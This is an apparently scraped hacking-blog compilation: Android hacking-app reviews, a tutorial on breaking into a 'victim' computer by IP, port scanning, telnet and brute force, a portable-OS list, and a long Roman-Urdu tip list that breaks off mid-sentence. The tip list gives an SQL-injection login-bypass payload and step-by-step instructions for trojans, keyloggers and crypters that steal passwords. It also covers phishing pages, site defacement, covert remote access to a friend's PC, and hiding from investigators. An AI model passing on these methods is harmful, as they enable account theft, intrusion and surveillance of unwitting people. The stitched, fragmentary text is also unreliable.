This app requires a rooted smartphone to function fully but if you are using this app, chances are you have already rooted your smartphone. I unfortunately cannot root my work smartphone so was not able to test the Network Sniffer or host discovery features of the app but the rest of the app seems to be working perfectly.
If you want to monitor a network you own or manage, this is a good app for you to use. Thankfully it comes with a sensible interface which prioritizes information over looks and yet still manages to look fine.
I will not go deeper into what this app does because frankly speaking it will take a lot more than just hundred words to explain that. But for those who know what this app can do, it provides more versions available than any other app on the Google Play Market.
The app is also able to update the versions automatically so you don’t have to manually update them. This installer also comes with a pretty great scripter that allows you to run as well as manage your scripts. Of course the advance features will require a rooted device.
Want to discover your network? Get this app on your Android device. This is not the best hacking app for Android but it can help you in knowing how many wannabe hackers are using your internet connection to torrent illegal movies.
This is a great way to even know the mac addresses of the connected devices. The interface could use a bit lifting up but the clunky design does give it more credibility as a hacking app for Android. Apart from that there is nothing more to the app.
This is one of the best network tools for Android available today. I have personally used it a lot of times and it delivers each and every time. It can discover all the connected devices to your WiFi network. There is no restriction on the discovered devices as well.
The app also catches the MAC address and details the device manufacturer so you can determine who is using the network. I use this to close other devices from accessing my network when gaming, I don’t want freeloaders from my neighbors leeching off my speed and causing lag.
There are a ton of more features in the app which can really help an IT administrator or security personnel. If you need one network app on Android, get this one first and see if it works as good for you as it has for me.
I personally don’t endorse hacking; unless it is white hat one.
These days hacking have gotten really hard and only a few dedicated people are actually good at it. Before you say anything DDOS attacks are not hacking, they are like thousands of head banging on a door at once. If you have any questions regarding the apps and not hacking (I’m not a hacker) please ask them in the comments below.

Hackode

Androrat

Burp Suite
zANTI

Droid Sheep

dsploit.net
track pc ip address

track pc ip address

Literally, hacking is accessing something or somebody in internet without their permission or interest. While, speaking in summary, hacking is very easy job, it is like instead of using front door, finding the hidden door of a house and hijacking the precious things. Among all the hacking, hacking via IP address is one of the most common yet powerful beginning.
You may want to hack the website and put your advertisement there or grab some database information In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer. Because, www.website.com is hosted in separate web server rather than personal computer.
Another can be accessing your friend’s computer from your home. Again this is IP based and this is possible only when your friend’s computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.
Well, both of the hacking has the same process. Let’s summarize what we must do.
1. Confirm the website or a computer you want to hack.
2. Find or trace their IP address.
3. Make sure that IP address is online
4. Scan for open ports
5. Check for venerable ports
6. access through the port
7. Brute-force username and password
Now let me describe in brief in merely basic steps that a child can understand it.
First, getting the IP address of victim.
To get the IP address of the victim website, ping for it in command prompt.
For example,
ping www.google.com
will fetch the IP address of Google.com
This is how we can get the IP address of the victims website.
How about your friend’s PC? You can’t do www.yourfirend’sname.com, can you? Finding your friend’s IP address is little tough job, and tougher it is if he has dynamic IP address that keeps changing.
One of the widely used method to detect IP address of your friend is by chatting with him.
To Do so I will be using “netstat” command in windows. If you want to know the IP address of a specific person on Facebook or orkut or any chat service, there is only one way: Just invite or ping him for a chat and while chat is ON open ‘Command Prompt‘ on your PC (Start >Run>cmd).
note: before trying this make sure you close all the other tabs in your browser and only facebook is open. Also if possible delete all the history and cache from your browser.
note: You can not trace people behind proxy servers!
note: Now a days this method is not working with Facebook ,In my next post i will teach u how to get facebook user's ip address
Read this post to find facebook user's ip address: How to find an IP address of a  Facebook user?
When command prompt opens, type the following command and hit Enter.
And you will get all established connections IP addresses there. Note down all the suspicious IP’s
Now you got the IP address right? Is it online?
To know the online status just ping the IP address, if it is online it will reply.
If the IP address is online, scan for the open ports. Open ports are like closed door without locks, you can go inside and outside easily.
Use Advanced Port Scanner to scan all open and venerable ports.
Now you’ve IP address and open port address of the victim, you can now use telnet to try to access them. Make sure that you’ve telnet enabled in your computer or install it from Control panel > Add remove programs > add windows components.
Now open command prompt and use telnet command to access to the IP address. Use following syntax for connection.
telnet [IP address] [Port]
You’ll be asked to input login information
If you can guess the informations easily then it’s OK. Or you can use some brute-forcing tools.
In this way you’ll able to hack remote computer using only IP address.
Best 10 Lightweight Portable Operating Systems Available In 2016

Best 10 Lightweight Portable Operating Systems Available In 2016

Hello all, today i am here to give you some information about uncommon lightweight operating systems in the world. here i am not gonna talk about most common used operating systems like windows, linx and mac but i am introducing 10 very small and portable OS and some of this OS works in Linux kernel , that means you can run this operating systems in your older computer and you can also carry its live cd/usb as a portable Os along with you wherever you go.
Usually Operating systems are in GBs like windows 8 ,10 or Kali LINUX .Some people still rely on old systems but technology and softwares growing day by day , so it’s compulsory to up-to-date your system with latest softwares .Older computers hardwares give up in front of modern softwares .Don’t worry there are still soo many operating systems which supports grandfather’s computer. Here i have listed some micro ,small and portable operating systems which can be run on 80Mb of RAM .Some of OS supports floppy disk to boot from it.These operating systems are exteremly lightweighted and offer ability to run the operating system from USB stick or memory card,thats why it’s called Portable operating system. These operating systems boot live from USB and loads on RAM .These are 100% safe ,infact you will amazed when you try above Operating systems .It won’t harm pre-installed OS in computer. The given 10 operating systems are very smaller than you guess and the size starts from 1.44mb to 300mb, sounds crazy...huh?, just go ahead.
 a system with any processor
 10 - 125 Mb of RAM
 10 GB Hard Disk (Not required in Live Os)
Kolibri OS is the smallest ,no not smallest .It is micro GUI operating system ever. It was forked off from MenuetOS. Written completely in assembly language, it is available in two versions: 1.44MB with essential features and 3MB with additional features. Despite being small enough to fit in a floppy disk, Kolibri is a complete and working graphical user interface.KolibriOS is a tiny yet incredibly powerful and fast operating system. This power requires only a few megabyte disk space and 8MB of RAM to run. Kolibri features a rich set of applications that include word processor, image viewer, graphical editor, web browser and well over 30 exciting games. Full FAT12/16/32 support is implemented, as well as read-only support for NTFS, ISO9660 and Ext2/3/4. Drivers are written for popular sound, network and graphics cards.
 Boots up in less than 10 seconds
 Incredibly tiny ,micro in size
 required only 8MB of RAM to Run.
 Free Available OS image for downloading .Ranges from ~1.44MB
 Can be booted from floppy disk ,USB ,flash drive or other storage devices.
Kolibri can read many file systems including FAT32, NTFS, and EXT3/4. It has applications for all basic computing tasks, such as text editor, email client, HTTP client, etc.
Tiny core LINUX is an another micro OS like Kolibri OS .CorePlus ofers a simple way to get started using the Core philosophy with its included community packaged extensions enabling easy embedded frugal or pendrive installation of the user’s choice of supported desktop, while maintaining the Core principal of mounted extensions with full package management.Linux. Tiny Core uses the Linux Kernel and a set of command-line (text interface) tools including busybox .
Unusually Fast. Unlike most operating systems, the Tiny Core can run completely from RAM. Individuals with RAM to spare can even use Tiny Core to load and run their programs from RAM (you didn’t know your computer could run Open Office and Firefox so quick). Experienced users can still install Tiny Core to disk, but Tiny Core can run in 48 megabytes of RAM … or less.
TinyCore becomes simply an example of what the Core Project can produce, an 15MB FLTK/FLWM desktop.
It is not a complete desktop nor is all hardware completely supported. It represents only the core needed to boot into a very minimal X desktop typically with wired internet access.The user has complete control over which applications and/or additional hardware to have supported, be it for a desktop, a netbook, an appliance, or server, selectable by the user by installing additional applications from online repositories, or easily compiling most anything you desire using tools provided.
1. Core [10MB] : Core is the base system which provides only a command line interface and is therefore recommended for experienced users only.Ideal for servers, appliances, and custom desktops.
2. Tiny Core [15MB] :TinyCore is the recommended option for new users who have a wired network connection. It includes the base Core system plus X/GUI extensions for a dynamic FLTK/FLWM graphical desktop environment.
3. Core Plus [86MB] : CorePlus is an installation image and not the distribution.With lots more advance features like wireless network support.
Damn Small Linux is a small Linux operation system about 50MB that can be run from USB flash drive in RAM within 16MB .It is not only small but come with fast operating system. It has a nearly complete desktop, and a tiny core of command line tools. All applications are chosen with the best balance of functionality, size and speed.
 Boot from a business card CD as a live linux distribution (LiveCD)
 Boot from a USB pen drive
 Boot from within a host operating system (that's right, it can run *inside* Windows)
 Run very nicely from an IDE Compact Flash drive via a method we call "frugal install"
 Transform into a Debian OS with a traditional hard drive install
 Run light enough to power a 486DX with 16MB of Ram
 Run fully in RAM with as little as 128MB (you will be amazed at how fast your computer can be!)
 Modularly grow -- DSL is highly extendable without the need to customize
Puppy Linux is Linus Operating System that has fast on startup even in old PCs and it does not require antivirus software. Administering Puppy is quick and minimal. It’s easy to set up because Puppy Linux can be run from CD, DVD or USB flash drive. It’s also fast on loading, in less than a minute because Puppy Linux is small. Puppy has size about 100 MB, or about 256 MB with OpenOffice.
 Easy - Just use a CD or USB flash to boot a PC. Puppy Linux is downloadable as ISO , an image that can be burned to CD or DVD.
 Fast - Because Puppy is small, it can live in your PC's memory and be ready to quickly execute your commands, whereas in other systems, programs are first read from drive storage before being executed.
 Save Money - Even if your PC has no hard disk (ex, broken hard disk), you can still boot Puppy via CD or USB and continue working. Old PCs that no longer work with new systems will still work good-as-new with Puppy.
 Do More - Puppy boots in less than a minute, even in old PCs, and it does not require antivirus software. Administering Puppy is quick and minimal. With Puppy, you just have to take care of your data, which you can easily save to USB flash (Then forget about your operating system!). Your data can be read by other computers.
 Do Magic -Help your friends suffering from computer malware by booting Puppy and removing malware from their PC (use antivirus that is built-in or can be installed in Puppy). Example - bad Autorun.inf is easily removed by Puppy (Just delete it as well as its companion exe program). If your friend thinks that she has lost data from her corrupted hard disk, boot Puppy and try saving her data!
 Carry Anywhere (Portable) - Because Puppy is able to live in CD/DVD or USB flash, as well as save data to these same devices, you can carry your programs and data with you.
NimbleX is a small but versatile operating system which is able to boot from CD, flash memory (USB pens or Mp3 players) and even from the network. Because it runs entirely from a CD, USB or network it doesn’t require installation.
NimbleX was designed to be versatile, user friendly, very fast and most importantly indestructible.
In NimbleX you can browse the web with Firefox, chat with your friends using the Kopete multi-protocol IM application, download torrents with Transmission, use DC++, connect remotely to other computers and many more.
A perfect beautiful portable LINUX under 250MB .Slax USB is modern and portable Linux operating system with small size and fast on loading. It comes with basic applications and also beautifully designed .Slax is a Live operating system based on Linux runs from an external media without any need for permanent installation.
Slax is available for 32bit and 64bit processor architectures. The 32bit version is designed to run on very old computers (as old as Intel 486; that dates back to 1989). It will run properly on brand new computers too, but it is limited in the amount of RAM it can see and limited to 3GB of RAM maximum. The 64bit version has no such limits, but will not run on computers older than a few years. If you plan to use Slax on very old computer, or you seek for a system with maximum possible compatibility, then choose 32bit. If your intention is to use Slax on brand new machine, you’ll better go for 64bit.
PUD Linux is a light and fast portable operating system based on Ubuntu Linux, but with small size (about 256 MB), and Chinese enhancements (both Simplified/Traditional). It has minimalist desktop with pre-configured and selected applications.
 Minimalist Desktop
 "Plate" User Interface
 LiveUSB, Boot to Ramdisk
 "Opt-Get" Plugin System
 Patched Kernel and Optimized
 Various Backup Methods
 "Build-LiveCD" ToolKit
Porteus is a complete linux operating system that is optimized to run from CD, USB flash drive, hard drive, or other bootable storage media. It’s small (under 300Mb) and insanely fast which allows you to start up and get online while most other operating systems are left spitting dust. Porteus comes in both 32 & 64 bit and aims to keep on the bleeding edge. It also supports several different languages and the user forum has language sections. Join the community now!
 Lightning-fast boot time
 Can be run from USB Flash drives, CDROM's, DVDROM's, hard disks, flash card devices, or just about any device you can get your PC to boot from!
 LZMA2 (xz) compression for modules
 Changes to the system (customization, downloaded files, browser history and favorites, etc) can be saved persistently to your USB or hard drive, or you can boot into 'Always Fresh' mode, and no changes to your system will be saved anywhere
 Support for dozens of languages
 A dependency-resolving package manager written just for Porteus, with built-in access to 5 slackware repositories.
 Porteus-specific scripts for creating and manipulating modules, network configuration (wifi included), language selection, and much more
 Updated installers for linux and windows
 "Porteus Settings Centre" which serves as a central location for updating, installing, managing settings, viewing system information, and much more!
MooLux is a portable Linux operating system based on Slackware that utilizes the KDE desktop environment. MooLux is contain a lot of useful tools for Internet browsing, email, chat, multimedia, office and software for C, Python, Perl programming tasks, and some simple games. MooLux needs at least 1 GB memory space on USB Stick or memory card.Moolux can also easily expand using packages from Slackware or other Slackware 3rd party sites.
 Based on Slackware 12.2 with kernel 2.6.27.7- Kernel support Aufs, squashfs, Squashfs-lzma, and Bootsplash
 KDE-3.5.10
 Openoffice.org-3.1
 Kaffeine Media Player-0.8.8 with Full Codecs from Mplayer
 Firefox-3.0.11 with Flashgot, Thunderbird-2.0.0.22, Pidgin-2.5.8 with guification
 -3B-1.0.5 Grsync-3.0.2, Gftp-2.0.18, ktorrent-2.2.7
 gparted-0.3.8, Gslapt-0.4.0
 gimp-2.4.6, qcomicbook-0.3.4,StarDict-3.0.1
 Bluefish-1.0.7,kchmviewer-3.1.2, Supertux-0.1.3
 Wlassistant-0.5.7, KDEBluetooth-1.0-Beta
The above listed Operating systems are incredible ,no doubt but it can’t by replaced by Primary OS like windows or mac .These OS are specialized to rescue administrator computers accounts .Also ,these OS can revive your old computer.
 Improved Features Of New Kali Linux 2.0 And How To Upgrade To It
 Top 15 Advanced Operating Systems For Hackers
 Linux Powerful Distros For Hacking Or Security: Kali, Tails And Qubes
Best 10 Lightweight Portable Operating Systems Available In 2016
Minimum Requirements:
1. Kolibri (Size: 1.44MB)

kolibrios.org/en/index


tinycorelinux.net

www.damnsmalllinux.org


puppylinux.org
xiaopan.co

www.nimblex.net

www.slax.org


pud-linux.sourceforge.net/index.en.html


www.porteus.org


www.moolux.org
hacker 15 best operating system

hacker 15 best operating system

Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. Mati Aharoni and Devon Kearns of Offensive Security developed it by rewriting BackTrack. Kali Linux is the most versatile and advanced penetration testing distro. Kali updates its tools and it is available for many different platforms like VMware and ARM. if you want to know more about Kali Linux then i recommend you read my previous article: An Introduction To Hacker’s OS Kali Linux And Setup TutorialLinux
back box

Parrot

Deft
Live
sourceforge.ne

https://sourceforge.net/projects/nst/

bugtraq-team.com/downloads


www.nodezero-linux.org/downloads


www.pentoo.ch/download/

www.gnacktrack.co.uk/download.php

www.pen-tests.com/blackbuntu-download.html
s-t-d.org/download.html


linux.softpedia.com/get/System/Operating-Systems/Linux-Distributions/WeakNet-Linux-43383.shtml


sourceforge.net/projects/cyborghawk1/files/latest/download
Hacker 5

Hacker 5

H-1 Hacking means Get the Admin Rights on any Site and Upload ur Deface.In simple words, You can say that it means Breaking the SecurityH-2 Hacking karte waqt in par amal karna!1) I.p change ya hide krna..2) Kabi government ki sites ko mat cherna..3) Agar g0vernment sites ko cherna ha to apne pc se kbi mat cherna! Matlb net cafe se hack krna!Is k baare mein ager koi question ha to p0cho.. Phr next start karte hainH-3 While hacking you've to hide your ip in order to defence. Get ip info from www.ip2location.comH-4 Kuch ehm chzn jo k hacking mein bht Zada help ful hain!DorksExploitsDeface pagesShellsScannerH-5 JiN Frnz k Pas NeT Availble hai or Web HckinG Mai Intrestd hain. Wo Facebok pe Group join kren.Pakistan Urduhack security teamH-6 pc 2 securty hakingwww. madleets .comwww.code.box.skwww.rootshell.comwww.cyberarmy.comwww.search.cai.comwww.xforce.iss.netwww.infowar.comwww.codes.ing.comH-7 Learn hacking and internet security (id hacking, google hacking, wifi hacking, IP hacking, keylogging) e.t.c by Visiting Www.itshine.tkH-8For hacking turorials:1.http://adf.ly/Zmk762.http://adf.ly/ZmkBk3.http://adf.ly/ZmkIT4.http://adf.ly/ZmkNx5. http://adf.ly/ZmkVPH-9 Agr ap hacking knowledge hasil krna ha to visit with detailwww.hack.co.zawww.rootabega.orgwww.rootshell.comwww.insecure.org/sploitsH-10 Just jo web hck krte ho us ka link whan ja k notify k tab mai ja k dy do apne nam se ya ksi or knam se. . But naam cnfrm kr lena tmary nam ka agr whan alrdy koi ho to tmari sites b us k hsy mai jain gi. . . Us ka rank bry gaH-11 Is k lye manual meth0d b hai aur kuch softwarez b hain! Manual meth0d se zada tar i.p trace ho jata ha! Aur softwarez se ni h0ta!H-12Jis website ko hack karne he us k last me admin/login.php likho.jese facebook.com/admin/login.phpAurUsername: adminPswrd:'or"='('or"=') ye posword he try it now.H-13 'or"=' ye SQLI ki basic ha web ki programingka fault ha or yo ha 'or'1'='1 basically query run horahi ha ya ek true statement ha so login ho jahy ga.p-14.0 MagicPs 1.5 Jst for Yahoo id and paswrd stealing. Dwnload it frm 4shared.com Before using it disable ur anti virus. . kiu k ye ek Trojan hai.AntiVirus isy detect krta hai as a VIRUS or delete mar daita hai....._ye software Instal kro ye ek chota sa trojan soft hai. Sb setting kro us mai. eg apni yaho id type kro js pe wo paswrd snd kre ga. file name select kro pic exe rar koi file type select kro. Fake eror koi selectr kr k. Create mps pe click kr do.H-14 Instal kro ye ek chota sa trojan soft hai. Sb setting kro us mai. eg apni yaho id type kro js pe wo paswrd snd kre ga. file name select kro pic exe rar koi file type select kro. Fake eror koi selectr kr k. Create mps pe click kr do.H-15 Targets ko leke hack krna to CEH k lye b 60% chances h0te hen btw if i try 20% chances hoskte hen. Or me g00gle index query he use krtahu btw aksar scannerz use krta hu. Or hacking k lye u mst knw bout c0mplete sql injection... Wo b Manually ..  site ko hack krte waqt week point h uske security or b kch wholes means weak point h0te henH-16 Guest. . Ya user acount ma cmd open kr k Type kren. Net User Administrator asdfg Enter kr den. Asd paswrd lag jai ga. Admin ka paswrd. . YaRun mai type kren. Lusrmgr.msc or yhan se paswrd set kren. .H-17 I.p Matlb Internet protoc0l..Har Internet connection ka i.p hota ha jis se ap ki p0siti0n ko trace kia ja skta ha! Wo kuch is tarhank h0te hain192.168.1.1 etcH-18 Jo web vub gi usi ma login ho ga / chracter use karny say ya vub khatam ho jata ha or hr web ma admin bi ni hota.H-19 Site hack kr k har hacker Miror ki boht si sites hain un mai ksi pe b hckd site ka miror dy dta hai. . . Yhan har hckr ka sara record hota hai. . Mai ne jhan ki ranking btai wo Mirror.sec-t.net web hai. . .H-20 Free Program For Hack Password:http://www.mediafire.com/?dncqqjpe3r5pz3sIts 100% WorkingH-21 One of best software 4 cracking is ws32dsm if u want 2 learn cracking then visit astatalk.comH-22www.Hackerbradri.NetDownload Hacking E-Book Name Of Book Is Google Hacks,Web Hacking Through Google in Urdu EditionH-23 Sony: Hacker stole PlayStation users' personal info http://on.cnn.com/gxgr7kH-24 Hacking Tip: Hacking ke liye aik software use hota hai us software ka naam hai"magicps.1.5" search Link: www.4shared.comH-25 For hacking a web u will need.1. sql helper v 2.72. exploit scanner3. Havij for admin finder and Md54. DorksH-26 There R 5 Methods of Hacking Email IDs:Fake Login Pages-Cookie Stealing-Social Engineering-Brute Forcing-Trojans or Keyloggers.And Once More u can ask the paswrd frm the ownr of that id!H-27 Email Hacking by Software:Email Hacking k liye ek Software use hoti hai jo Internet se purchase karni hoti hai. Is mein zyada tar fraud hota hai. Aksar Softwares work karti hain aur aksar nahi.H-28 Email Hcking by Cracking:Is k lie b ek Software use hoti ha.Is Software me Victim ki Id rkhni hoti ha or kuch Paswrds hote hn.Id r Paswrd is Software me rkh kr Crack krni hoti hn.Ye method thora mushkil hota ha jiski wja se aksr Hackrz is Software se Hack ni kr skteH-29 Email Hacking by Fake Pages:Ye ek page hota hai jo kisi victim ko dhoka dene kliye banaya jata hai ya bana banaya Download kyajata hai. Ye sub se easy method hai Email Hacking kaH-30 *Hacking*1.Arbitary File Deletion2.Code Execution.3.Cookie Manipulation4.CRLF Injection5.Cross Frame Scripting (XFS)6.Cross Site Scripting (xss)7.Directory Traversal8.Email Injection.9.File inclusion.10.Full path Disclosure.11.LDAP injection.12.PHP code Injection13.Remote XsL inclusion.14.SSI injection15.SQL injection16.URL Redirection17.xPath Injection.18.CSRF19.LFI20.RFIH-31Common Web Hacking Methods.1. Cross Site Scripting (xss) 2. Cross Site Request Forgery (CSRF)3. Click jacking4. Gifar 5.Url Fram injection6. SQL injection7. Local file Inclusion (LFI)8. Remote file inclusion (RFI)H-32 Hacking ki kuch terms use h0ti hain!Jaise:"N0obs" matlb k begineer hai.. Jo bunda abi begineer ho new new hacking sekh raha ho..2) "Vulnubrle" matlb jo site hack ho ske..H-33 Hacking meth0ds Ye Hain:XSSDNNRFILFISQL INJECTI0NIISROOTINGBYPASS L0GINRooting ki agey bohat types hain!H-34 How To Hack A Yahoo Messenger's Password ?Th3r3 A Lot Of Ways1:with Mps Jo Easy hai.2:with Keylogger ,sa App Facebook,Msn etc b hack kar sakta ho.3: fake page Hai isi sa app B yahoo,facebook,msnetc hack kar sakta ho lakin sub k Fake page different haiH-35> Ye nishan jhan hai whan just enter pres krna haiye type na kr dna >4. . 5 lines hain. Words daikh lo case sensitive hai. Jese whan likhe hn same usi tara capital smal leter use krne hn. .H-36 AGR Ap kisi ka B(Facebok,yaho)Acount Hack krna Chahty ha To Downlod This Software"LOGIN SPOOFER"Make Fake Pages & Hack 0ther's AccountH-37P1Keylogger na to koi Software hota ha or na hi koi Virus.Balke ye Tool hota ha jis se ap apna Virus bnate hn.Ye Virus ap Victim ko bhejte hn.Is pr Click krty hi ye Victim k press hone wale Keys ko save kr k ap tk puhunchata ha.Ardamax Keylogger sb se best ha.Is me ap Victimk Screen Shots b hasil kr skte hn.Keylogger se Virus bnate huwe apko kisi Web Hosting ka Username or Password dena ha,Jahan pr apke Victim k Passwords save hote jaenge.Byethost.com best ha Keylogging k liye.Yahan apna Account bnaen or Vista Panel melogin ho jaen.Samne right side pr apka Ftp Username show ho rha hoga.Ye Ardamax me Virus bnate huwe Copy Paste kr denH-38P2Aap Tutorial, Video aur Ardamax yahan se Download kar sakte hain:http://tinyurl.com/h4ckerkeyArdamax mein Hosting ki details dene k baad Ok karen. Virus Ready. Ab is ko Crypter mein daal kar(Ye Keylogger k saath download karen) Virus ka Icon change kar k koi Image bana len, taake Victim ko shak na ho. Aur jab Victim is par Click kar k Open karega to uska Pc gaya....-----EnD-----H-39keylogger Software se Yaho Facebook Msn Hotmail gmail Sb idz hack ki ja skti hain. .Keyloger boht se hain.Ardamax keylogerPerfect keylogerStealth keylogerSilent keyloger Etc. .Sb k use krne ka method same hai. Ak Trojan file create krte hn. Usy koi b icon dy kr ksi b extention(.dat .avi .jgp .exe) mai cnvrt kr k us file ko mail kr diya jata hai js ki id hck krni ho. Agr wo bnda wo file pic, open kr le.To wo keybord ki jo b key pres kre ga wo ap ko mail mai mile ga. Us k sb pwd mil jain ge. Us k pc ki screen print. Pics bH-40 Pc keyloger se nai Trojan se hack krte hain. loger se to jst Keybrd k key log hote hn or Prntscren le skte hn etc. or Trojan se kafi control ajata hai. is wqt Pro Rat Trojan he zyada use honywala Trojan hai. Tutorial Hito k Blog pe mil jai ga. funvirus.tkH-41 Keylogger : Keylogger Ek Software Hai Jo www.Itshine.tk Mai B Hai Ya Google sa Find karo Isi download karo Our Ek Torjan File Banao Our Isi File Ko send karo isi O Jitna b Keys press kara gay Keyboard k O sub save ho kar app k email karday gay... Next hai fake page.H-42Fake page se hacking karne ko phising kehte hain!H-43P1today i will sharing hw 2 make fakepage of any web so first of all open web i.e facebook.com then right cick n go 2 option view source orH-44P2 open source depend upon ur browser nw u hv a html script nw select all (ctrl+a)then copy it (ctrl+c) then open a notepad and past(ctrl+v)H-45P3it there n save(ctrl+s) it as index.html nw in notepad find (ctrl+f) and action nw u will get an address in "" just remove that address and pastH-46P4pass.php download a little php script 4rm tinyurl.com/fakephp open it in notepad u will findweb address change it 2 redirect web i.e facebook.comH-47P5Now upload these files 2 free hosting web like 110mb.com, 00abiz.com, my-php.net ect there in ftp u will find a folder go in it then thereH-48P6there u will find index.html replace it 2 ur files u cn also upload more fake pages by creating new direction i.e facebook, yahoo*end*H-49 YAHOO ID password and ID stealing k liye MagicPs 1.5 Ya MPS ++ Down load kren. Its a trojan use it at ur own risk. www.ITshine.tkH-50 Create mps se wo ek file create kre ga js ko ap ne zip, rar mai rakh k us id pe mail krna hai js ki id hck krni hai. Agr wo usy open kr leta hai. Pictr smj k to us ki id, paswrd tmari id pe recive ho jai gi by mailH-51Magic++ (Mps) App Www.ITshine.tk Sa Download Karo our Open karo Ek Torjan File Banao Isi K Bad O File isi ko send karo kis k Yahoo K pass hack karna hai ok Jab o open kara gay isi K PassWord app k Pass and enjoyH-52 MagicPs 1.5 Jst for Yahoo id and paswrd stealing. Dwnload it frm 4shared.com Before using it disable ur anti virus. . kiu k ye ek Trojan hai. AntiH-53 Instal kro ye ek chota sa trojan soft hai. Sb setting kro us mai. eg apni yaho id type kro js pe wo paswrd snd kre ga. file name select kro pic exe rar koi file type select kro. Fake eror koi selectr kr k. Create mps pe click kr do.H-54 Create mps se wo ek file create kre ga js ko ap ne zip, rar mai rakh k us id pe mail krna hai js ki id hck krni hai. Agr wo usy open kr leta hai. Pictr smj k to us ki id, paswrd tmari id pe recive ho jai gi by mailH-55 guys jo bhe newbie hacker hen they must learn xss tunnelingH-56 XSS Tunneling: Complete Tutorialwww.facebook.com/topic.phpH-57 acuntex scanner download kren,wo batadeta ha k site ks method se h4ck hoskti haH-58 Change the default location 4 installing programs go 2 run n type regedit hkey_local_machine?/software?/microsoft?/windows?/currentversion nw in right site find c:?/program files change itH-59 Refrl wali site me apne target ka email qabo kro phr usky mail me Fake page ka link send kr k uska email aur pasword hasil kroH-601.Keyloger ki setting kr k by email victim ko bhejo.2.Linux ki ek ek site alag alag deface krni hoti haH-61Ab HaCkiNg SekhiUrdu Main , Free HaCking SofTwAre DownLoAd KarEn, HaCkiNg SoftWaRe Kexe Use Hote Hain, SaFety TiPs , HaCking RulEs, HaCkiNg HeLpFul LiNks Or Bhi BuHuT KuCh JaniYe HaCkiNg Ke Bare MaiN Wo Bhi SuB Urdu Main Visit Karen www.sherazhackz.tkH-62P1Download Prorat. After its downloading, Right Click on the Folder and choose Drive to extract. Now we will create the actual Trojan file. Click on Create and choose Create Prorat Server. Now enter your Ip Address so that Server could Connect to you.H-63P2If u dont know your Ip Address, Click on little arrow to have it filled automatically. Now put yourEmail so that when a Victim gets infected, it will send u a Message. We will not be using the rest of the Options.-----EnD-----H-64H-62 and H-63 is Prorat Trojan Tutorial.H-65 ye info galat h.K linux ke ek ek site alag alag deface karne hoti hyn.Ap server root kar k sb site ko script ya to0l se mass deface kartae hoH-66 Server Hacking:Server Hacking k liye ek Software bhi use hotay hain. Ye ek normal file (mp3, pic) ko ek Hacking file mein convert kar deti hai. Jab is file ki setting us Software k through mukammal ho jati hai to usy kisi Victim ko send karna hota hai. Jab wo User us file ko open karta hai to us ki Information aapki Id par mail hoti hain.H-67 Facebook Password Hack karne k liye Emissary Keylogger use karen. Download from http://pcguru.tkYe victim k pc ki screen shots le kar aapki mail id par send karta hai. Is k liye aap k paas Microsoft FrameWork.net Software install hona chahiye. Download from:Www.microsoft.com/net/:H-68 For Msn Hacking Download (Hotmailhack Faqs v1.0)Our Windows Hacking.(Win hacker 2.03) download karo.our(Win Secure):H-69H-66 'server hacking'these are called binderz. . . . .Massive arc kafi acha ha.H-70 Yahoo Hacking K Laha Download(Trojan Maker)r(Mps)(Bus Hack) r(Deep Throat Trojan).Or Net Hacking K Laha (Download Net Hack 3.4.2)H-71yahoo hacking tipP1)yah00 id hack krni h t0 dwnlod"MagicPS"open kr0 j0 disable tskmngr,regedit,cmd send ip yah00 paswd etc k0 select krenH-72p2)phr ic0n jpg wala aur nam mn lagend.jpg lekh k creat mps pe clck krn phr j0 file bane ki zip f0ldrm dal k us ki id pe phank den (next)H-73p3)create mps se phla id mn apne apni id lekhni hjis pe tr0jan apk0 paswd mail kr dy ga.. .k0i binderle k s soomro.jpg k0 ksi(next)H-74p4 aur file se bind kr k zip mn dalny se antivirus tr0jan(Makhdoom.jpg) k0 na pakr saky ga. *End*H-75 yahoo id ka pasword hack karne k liye cookies section ka itamal kia jata hy. Esliye cookies ko wash kr dia krein hack nhe hogi idH-76Yahoo id ko hack krny k liye fake page r logger k ilawa ye method use hoty hn c00kie stealing...cracking+ pass reset exploit tha jo ab work nhn krtaH-77 Email hacking k lye ap ko victim ki id or password pata hoto aram se hack ho jati he.H-78P1 There are these methods of Email Hacking. . .1- Fake Login Pages2- Cookie Stealing3- Social Engeenering4- Brute Forcing5- Trojan (Rat= Remote Administration Tools)6- Keyloggers & CrackingH-79 P2 We will use Fake Page for Email Hacking.. . This is a Page which is made for Victim or downloaded. . .Q- How to use fake page? . . .Ans- This is a page. .This page is sent to victim.When user opens this page link,His information and password etc is sent to ur Hosting accountH-80 P3 When u download fake page, You will have to upload this on any Hosting account . . . Like T35.com . . . Then this site will give u link . . .Now u have to send this link to victim's Id . . . Whenever victim opens this link, His/Her info & password will be in ur Hosting account . . . To download Fake page, Visit:Www.HackMeOut.blogspot.com-------EnD--------H-81 Email any id by using Ardramax Keylogger.H-82P1 T0pic: H0w 2 use ur own's pc or ur 4nds pc 4nd anywhere!H-83P2: First of all open this site www.secure.logmein.com and make a acount and sign in..H-84P3: After signing there is opti0n 2 "Add This Computer".. Click on this.. After that signout.. N0w if u wanna use ur pc 4m anywhere..H-85P4: The cnditi0n is this that ur pc should b on.. N0w sign in 2 ur logmein acount 4m anywhere use ur pc if ur pc is on....H-86P5: Similarly u can try the same trick wd ur 4nd's pc.. Just use ur 4nds pc and sign in 2 ur logmein's acount and add ur 4nds pc tooH-87P6:  And use ur 4nds pc 4m anywhere requiring 1 c0nditi0n that the pc is on. U can add 5 pc 4m 1 acount... END..A trick by www.itdosti.comH-88P1 How To Hack Ur Friends Computer Using Website ?1st Open Www.Logmein.com And Make A Account And After That Sign In Ho kar Sign Ho jaho !H-89P2 Per Apna Dost Ya Net Cafe Jay k visit Www.Logmein.com Again and Open Ur Account And Click On Add This Computer And Add that Computer ok app 5 Computer Add kar sakta hoH-90P3 Our Per Apna Computer Open kar K Per Sa Apna Account open karo Our Jab app k dost Online Ho jaha isi k Computer Show Ho jaha gay k online ha and Use it.. Enjoy---END--H-91 Jin .php .asp webs mai Sql eror paya jata haiunhe sql injection se hack keya jata hai ye without soft tools hack ho skti hain par asaani k lye eror webs finding k lye Havij software use keya jata hai.H-92 Online Sql Injection Tools:Killer.blackapplehost.comRevtan.site40.netKerinci.netKinginfect.netH-93 Some Sql Injection Methods:Time base sqliSqli by finding valid columnsBlind folded sqliSqli by load file injectionH-94 Aap Scanners se Sql Site Hack karne k liye Vulnerabilities find kar sakte hain. In mein Exploit aur 